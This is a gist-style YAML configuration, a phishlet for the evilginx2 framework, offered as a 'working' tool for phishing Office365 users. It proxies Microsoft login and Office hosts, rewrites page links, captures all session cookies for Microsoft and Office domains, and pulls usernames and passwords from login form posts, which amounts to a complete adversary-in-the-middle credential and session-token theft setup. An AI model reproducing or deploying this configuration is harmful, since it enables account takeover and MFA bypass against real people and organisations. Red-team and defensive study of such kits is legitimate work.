@hazcod
Last active February 28, 2025 13:16
Working Office365 phishlet for evilginx2.
author: '@hazcod'
min_ver: '3.2.0'
proxy_hosts:
- phish_sub: 'login'
orig_sub: 'login'
domain: 'microsoftonline.com'
session: true
is_landing: true
- phish_sub: 'device.login'
orig_sub: 'device.login'
domain: 'microsoftonline.com'
session: true
is_landing: true
- phish_sub: 'www'
orig_sub: 'www'
domain: 'office.com'
session: false
is_landing: false
sub_filters:
- triggers_on: 'login.microsoftonline.com'
orig_sub: 'login'
domain: 'microsoftonline.com'
search: 'href="https://{hostname}'
replace: 'href="https://{hostname}'
mimes: ['text/html', 'application/json', 'application/javascript']
- triggers_on: 'login.microsoftonline.com'
orig_sub: 'login'
domain: 'microsoftonline.com'
search: 'https://{hostname}'
replace: 'https://{hostname}'
mimes: ['text/html', 'application/json', 'application/javascript']
redirect_only: true
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['.*:regexp']
- domain: 'login.microsoftonline.com'
keys: ['.*:regexp']
- domain: '.microsoft.com'
keys: ['.*:regexp']
- domain: 'microsoft.com'
keys: ['.*:regexp']
- domain: '.office.com'
keys: ['.*:regexp']
- domain: 'office.com'
keys: ['.*:regexp']
auth_urls:
- '/kmsi'
- '/landingv2'
credentials:
username:
key: '(login|UserName)'
search: '(.*)'
type: 'post'
password:
key: '(passwd|Password)'
search: '(.*)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/'